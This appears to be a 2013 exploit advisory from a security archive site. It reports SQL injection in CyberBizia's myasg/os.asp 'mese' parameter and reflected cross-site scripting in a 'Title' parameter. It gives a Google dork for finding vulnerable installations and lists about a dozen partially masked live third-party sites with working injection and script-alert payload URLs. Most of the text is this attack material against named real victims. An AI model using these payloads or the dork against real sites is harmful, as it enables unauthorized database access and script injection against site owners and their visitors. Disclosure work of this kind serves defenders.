CyberBizia Multiple Vulnerabilites

2013.08.29
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"Powered by CyberBizia\"

#******************************************************************************** # Exploit Title : CyberBizia Multiple Vulnerabilites # # Software link : http://www.cyberbizia.com # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by CyberBizia" # # Date: 2013/08/29 # -------------------------------------------------------------------- # Exploit 1 : Sql Inkection # # Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection] # # # Proof: # # http://www.advancXXXiology.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.artiXXXri.com/myasg/os.asp?elenca=mese&mese=1' # # http://www.basketXXXtu.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.cdsdonXXXliari.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.digXXXt.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.cosXXXo.com/myasg/os.asp?elenca=mese&mese=1' # # http://www.cdsdXXXecagliari.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.baskXXXrtu.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.immobiXXXacanze.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.magXXweb.it/myasg/os.asp?elenca=mese&mese=1' # # http://www.archXXXeno.it/myasg/os.asp?elenca=mese&mese=1' -------------------------------------------------------------------- # Exploit 2 : # # Location : [Target]t/?Title=[xss] # # # Proof: # # http://www.advaXXXdiology.it/?Title="/><script>alert(1);</script> # # http://www.artXri.com/?Title="/><script>alert(1);</script> # # http://www.basketquartXXu.it/?Title="/><script>alert(1);</script> # # http://www.cdsdonnXXXecagliari.it/?Title="/><script>alert(1);</script> # # http://www.digicsXXoft.it/?Title="/><script>alert(1);</script> # # http://www.costiaXXXuto.com/?Title="/><script>alert(1);</script> # # http://www.cdsdonXXnecagliari.it/?Title="/><script>alert(1);</script> # # http://www.baskXXuartu.it/?Title="/><script>alert(1);</script> # # http://www.iXXXarevacanze.it/?Title="/><script>alert(1);</script> # # http://www.mozXXXna.com/?Title="/><script>alert(1);</script> # # http://www.aXXXXXXleno.it/?Title="/><script>alert(1);</script> # ###################### discovered by : ACC3SS ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top